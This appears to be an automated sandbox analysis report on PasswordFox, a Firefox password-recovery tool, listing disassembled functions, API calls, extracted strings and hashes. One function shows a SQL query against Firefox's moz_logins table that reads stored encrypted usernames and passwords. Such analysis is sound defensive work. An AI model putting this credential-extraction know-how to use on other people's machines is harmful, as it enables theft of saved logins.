                                        • Instruction ID: d7b2c1fe3ac28435f262e00ba4c0655e1632008321094755c7529686555df315
                                        • Opcode Fuzzy Hash: 318a56d019d3aaa7f96921b2e4e0ce1dd904295b8dddfdd2e3368ec152fa45fb
                                        • Instruction Fuzzy Hash: CC3181B2900309AAD720ABA59C86D7B73BCDB44714F50817FF224B21C3E77C9A459A9D
                                        Function 00407044 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407065
                                        • memset.MSVCRT ref: 0040708F
                                        • memset.MSVCRT ref: 004070A5
                                        • memset.MSVCRT ref: 004070BB
                                        • _snwprintf.MSVCRT ref: 004070F4
                                        • wcscpy.MSVCRT ref: 0040713F
                                        • _snwprintf.MSVCRT ref: 004071CC
                                        • wcscat.MSVCRT ref: 004071FE
                                          • Part of subcall function 0040AEB5: _snwprintf.MSVCRT ref: 0040AED9
                                        • wcscpy.MSVCRT ref: 004071E0
                                        • _snwprintf.MSVCRT ref: 0040723D
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 1277802453-601624466
                                        • Opcode ID: f8dacbfd05d566ad0207a67edbf8d3d069a65d3e3b5223f6146df0e46472cafa
                                        • Instruction ID: d2132ec82104963cb5620df9263e511b897797033fbb75d2efbdcd343e46ae46
                                        • Opcode Fuzzy Hash: f8dacbfd05d566ad0207a67edbf8d3d069a65d3e3b5223f6146df0e46472cafa
                                        • Instruction Fuzzy Hash: A061AD31900208EFDF14AF54CC86EAE7B79EF44314F1041AAF905BA2D2DB34AE51CB99
                                        Function 0040B0B3 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintf$memset$wcscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 2000436516-3842416460
                                        • Opcode ID: b5760ba2ecb5c71c25fe5a138b9a73d33b54b4adf2fcc02053158ea44dd8fb82
                                        • Instruction ID: 8c679b64bd822a11a4db2b245e7836b5362e54c0cf9053333f32ebf9adf46155
                                        • Opcode Fuzzy Hash: b5760ba2ecb5c71c25fe5a138b9a73d33b54b4adf2fcc02053158ea44dd8fb82
                                        • Instruction Fuzzy Hash: C24113B194021DAAEB20EB55CC45FFB727CFF44344F4441BAB918B2192E7349B548BAD
                                        Function 00403C5B Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 178stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404216: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00403C73,?), ref: 00404228
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00403C84
                                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00403C98
                                          • Part of subcall function 00404ADD: ReadFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,00403CAA,?,00000000,00000000), ref: 00404AF4
                                        • memset.MSVCRT ref: 00403CC7
                                        • memset.MSVCRT ref: 00403CE7
                                        • memset.MSVCRT ref: 00403CFC
                                        • strcmp.MSVCRT ref: 00403D20
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E85
                                        • CloseHandle.KERNEL32(?), ref: 00403E8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                        • String ID: ---
                                        • API String ID: 2784192885-2854292027
                                        • Opcode ID: 552d603059e62ae8c9e5a66bb488f6aa050529ee5c50509e70ef86cc3eb9e9cf
                                        • Instruction ID: b80983b98e9648236443da80f1610546219466077700600bd95e69fe60c60e57
                                        • Opcode Fuzzy Hash: 552d603059e62ae8c9e5a66bb488f6aa050529ee5c50509e70ef86cc3eb9e9cf
                                        • Instruction Fuzzy Hash: 4E511FB280425DEADB219E658C818DEBB7CDF15305F1041FBE509B3182DA389FC59BE9
                                        Function 00403A29 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 196COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B251: memset.MSVCRT ref: 0040B27C
                                          • Part of subcall function 0040B251: wcscpy.MSVCRT ref: 0040B293
                                          • Part of subcall function 0040B251: memset.MSVCRT ref: 0040B2C6
                                          • Part of subcall function 0040B251: wcscpy.MSVCRT ref: 0040B2DC
                                          • Part of subcall function 0040B251: wcscat.MSVCRT ref: 0040B2ED
                                          • Part of subcall function 0040B251: wcscpy.MSVCRT ref: 0040B313
                                          • Part of subcall function 0040B251: wcscat.MSVCRT ref: 0040B324
                                          • Part of subcall function 0040B251: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B333
                                          • Part of subcall function 0040B251: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B34A
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040B387
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040B393
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040B3A0
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040B3AD
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040B3BA
                                          • Part of subcall function 0040B251: GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040B3C7
                                        • memset.MSVCRT ref: 00403A68
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 00403A81
                                        • memset.MSVCRT ref: 00403AF2
                                        • memset.MSVCRT ref: 00403B07
                                        • _mbscpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403B7A
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403B90
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BA6
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BBC
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BD2
                                        • _mbscpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00403BE8
                                        • memset.MSVCRT ref: 00403BFE
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,00000006,?,00000001), ref: 00403C17
                                        Strings
                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00403AB4
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc_mbscpymemset$wcscpy$ByteCharMultiWidewcscat$HandleLibraryLoadModule
                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
                                        • API String ID: 384966959-1740008135
                                        • Opcode ID: 85f00eb0efc9c1ffdf0dd2931e8962a67ceadcff4ca46143de105bb7c4996516
                                        • Instruction ID: 6fe501b924ea4892e16e533dd6bbbd6bc35ce4bb996270a910368a75cee546d0
                                        • Opcode Fuzzy Hash: 85f00eb0efc9c1ffdf0dd2931e8962a67ceadcff4ca46143de105bb7c4996516
                                        • Instruction Fuzzy Hash: BC61F77280051EEEDF119E90DC859EE7BBDEB0431AF14017BF505B2192EB399F548B68
                                        Function 00402353 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        • memset.MSVCRT ref: 0040238C
                                        • memset.MSVCRT ref: 004023A1
                                        • memset.MSVCRT ref: 004023B6
                                        • _snwprintf.MSVCRT ref: 004023DD
                                        • wcscpy.MSVCRT ref: 004023F9
                                        • _snwprintf.MSVCRT ref: 0040243C
                                        • _snwprintf.MSVCRT ref: 00402472
                                        Strings
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00402461
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 004023CC
                                        • PasswordFox, xrefs: 00402453
                                        • <table dir="rtl"><tr><td>, xrefs: 004023F3
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00402363
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040240B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfmemset$FileWritewcscpywcslen
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$PasswordFox
                                        • API String ID: 1592343458-1216084738
                                        • Opcode ID: d7a81f6b5137373fe4cf2134810229e662d56ccb2226b4a9fc2a90679aad00ea
                                        • Instruction ID: 77499a437e4ca18f25f4b566ccf08979830a7e8899ef36d7b8f49d1ccdd78af5
                                        • Opcode Fuzzy Hash: d7a81f6b5137373fe4cf2134810229e662d56ccb2226b4a9fc2a90679aad00ea
                                        • Instruction Fuzzy Hash: 8C316772940218AADF20DB55DC85EDB73ACEB44304F9080B7B549F61D2DE785BC48B9D
                                        Function 0040A0C9 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(psapi.dll,?,00409CDD), ref: 0040A0DC
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040A0F5
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040A106
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040A117
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040A128
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040A139
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040A159
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                        • API String ID: 2449869053-70141382
                                        • Opcode ID: ca645339af4dce8cf14e05afc31322d940a1c319e245c9d4c19b0609aa7601d8
                                        • Instruction ID: e2902bbd2d2df0a0a2665514b5f869c205e32ed77b5c19c0dec3bbebffe865c7
                                        • Opcode Fuzzy Hash: ca645339af4dce8cf14e05afc31322d940a1c319e245c9d4c19b0609aa7601d8
                                        • Instruction Fuzzy Hash: D7014431941305EAD721AB78AE40BAB3AE4BB45B54F14413BF804F52D4D77DD446CA2E
                                        Function 004093EC Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 2081463915-1959339147
                                        • Opcode ID: 5e5474dcb265fab2e7559db415b74ff675467357c8a7eb17d073a8c107a42d0a
                                        • Instruction ID: 141cc0e57bd5805de38ceafa04f64b25099d4e730ebd55b25a00ba4e5e80b58e
                                        • Opcode Fuzzy Hash: 5e5474dcb265fab2e7559db415b74ff675467357c8a7eb17d073a8c107a42d0a
                                        • Instruction Fuzzy Hash: 05011E626CD71128F92821A62C07F87064ACB5177EF31803BFA48F40C7EF7C854690AD
                                        Function 0040A045 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409CE4), ref: 0040A054
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040A06D
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040A07E
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040A08F
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040A0A0
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040A0B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: 7e582fe6ebe7f1e07e78314aabc51041a3f7fc8460ebe8b0c385bf4fc28b3348
                                        • Instruction ID: 3548e4d072194770a4844a76898c4b9063ebb1afa7f97360c6ebe6afb7ba8783
                                        • Opcode Fuzzy Hash: 7e582fe6ebe7f1e07e78314aabc51041a3f7fc8460ebe8b0c385bf4fc28b3348
                                        • Instruction Fuzzy Hash: 9DF03171E12319A9C730AF656E40F6729E49785B84B14903BE800F32D4EB7DA45ACF6E
                                        Function 00407A2B Relevance: 19.6, APIs: 13, Instructions: 136windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407A68
                                        • SHGetFileInfoW.SHELL32(0040C3EC,00000000,?,000002B4,00004001), ref: 00407A85
                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 00407A9F
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 00407AD1
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00407B0B
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407B28
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00407B3F
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407B47
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00407B5A
                                        • GetSysColor.USER32(0000000F), ref: 00407B6E
                                        • DeleteObject.GDI32(?), ref: 00407BA2
                                        • DeleteObject.GDI32(00000000), ref: 00407BA5
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00407BC3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObject$ColorFileInfomemset
                                        • String ID:
                                        • API String ID: 3623935593-0
                                        • Opcode ID: 5973fd06d5558dc911c548379f1aab942a1b5c79585eb3052da6c94cd7ee003d
                                        • Instruction ID: 70c96f0b0c510efc06f06bdbc921eec1bfe708237d7f2dd35092dcb1fd8a2289
                                        • Opcode Fuzzy Hash: 5973fd06d5558dc911c548379f1aab942a1b5c79585eb3052da6c94cd7ee003d
                                        • Instruction Fuzzy Hash: 9A41D731680308FFE720AFA0DD8AF9777A9FB08B44F000529F7597A1D1C6F6A9508B59
                                        Function 00405E36 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcscpy.MSVCRT ref: 00405E47
                                        • wcscpy.MSVCRT ref: 00405E57
                                          • Part of subcall function 004059B2: memset.MSVCRT ref: 004059D7
                                          • Part of subcall function 004059B2: GetPrivateProfileStringW.KERNEL32(0040FDA8,?,0040C3EC,?,00001000,0040FB98), ref: 004059FF
                                          • Part of subcall function 004059B2: WritePrivateProfileStringW.KERNEL32(0040FDA8,?,?,0040FB98), ref: 00405A17
                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_00005C0C,00000000,?,?,?,?,?,?,?,00000000,?,?,00405F3B,00000000), ref: 00405EA5
                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_00005C0C,00000000,?,?,?,?,?,?,?,00000000,?,?,00405F3B,00000000), ref: 00405EAD
                                        • wcscpy.MSVCRT ref: 00405EB5
                                          • Part of subcall function 00405D0F: memset.MSVCRT ref: 00405D33
                                          • Part of subcall function 00405D0F: LoadStringW.USER32(?,00000000,?,00001000), ref: 00405D4B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stringwcscpy$EnumNamesPrivateProfileResourcememset$LoadWrite
                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                        • API String ID: 4216465668-517860148
                                        • Opcode ID: 84856da66dedeb1956171715193895ba0fd456ea9198924a4babaf81313ba53e
                                        • Instruction ID: 7f863a6f51319cd0588b36c23358cab96c7208ff8e6cce934dd096e5358724db
                                        • Opcode Fuzzy Hash: 84856da66dedeb1956171715193895ba0fd456ea9198924a4babaf81313ba53e
                                        • Instruction Fuzzy Hash: A5F01D65682618F5E52033626C8BF4B7E2CCF82B69F60423B7949351C385BD68448AAD
                                        Function 0040A161 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 0040A17A
                                        • wcscpy.MSVCRT ref: 0040A18A
                                          • Part of subcall function 0040434A: wcslen.MSVCRT ref: 00404359
                                          • Part of subcall function 0040434A: wcslen.MSVCRT ref: 00404363
                                          • Part of subcall function 0040434A: _memicmp.MSVCRT ref: 0040437E
                                        • wcscpy.MSVCRT ref: 0040A1D9
                                        • wcscat.MSVCRT ref: 0040A1E4
                                        • memset.MSVCRT ref: 0040A1C0
                                          • Part of subcall function 00404708: GetWindowsDirectoryW.KERNEL32(004101F8,00000104,?,0040A219,?,?,00000000,00000208,00000000), ref: 0040471E
                                          • Part of subcall function 00404708: wcscpy.MSVCRT ref: 0040472E
                                        • memset.MSVCRT ref: 0040A208
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,00000000), ref: 0040A223
                                        • wcscat.MSVCRT ref: 0040A22F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                        • String ID: \systemroot
                                        • API String ID: 4173585201-1821301763
                                        • Opcode ID: 85711f5a9a9af80195ed3bd077fd374c7f64ce4b399d39fdceb5c36c1e766c82
                                        • Instruction ID: 169749a7a6df712fe2e4d140a3a10a06551a5030272b022fcc2fe36dd37c6163
                                        • Opcode Fuzzy Hash: 85711f5a9a9af80195ed3bd077fd374c7f64ce4b399d39fdceb5c36c1e766c82
                                        • Instruction Fuzzy Hash: 6521A7A6805308A9D611E7A14C86DBB63ECDF45714F20417FF515F21C2EB7CAA44879F
                                        Function 0040805F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00408085
                                          • Part of subcall function 00404177: LoadCursorW.USER32(00000000,00007F02), ref: 0040417E
                                          • Part of subcall function 00404177: SetCursor.USER32(00000000), ref: 00404185
                                        • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 004080A8
                                          • Part of subcall function 00407FC5: _snwprintf.MSVCRT ref: 00407FF2
                                          • Part of subcall function 00407FC5: _snwprintf.MSVCRT ref: 0040801D
                                          • Part of subcall function 00407FC5: wcscat.MSVCRT ref: 00408030
                                          • Part of subcall function 00407FC5: SendMessageW.USER32(?,0000040B,00000000,?), ref: 00408057
                                        • SetCursor.USER32 ref: 004080CD
                                        • SetFocus.USER32(?), ref: 004080DF
                                        • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 004080F6
                                        • memset.MSVCRT ref: 0040810C
                                        • _snwprintf.MSVCRT ref: 00408131
                                        • SetWindowTextW.USER32(?,?), ref: 00408146
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
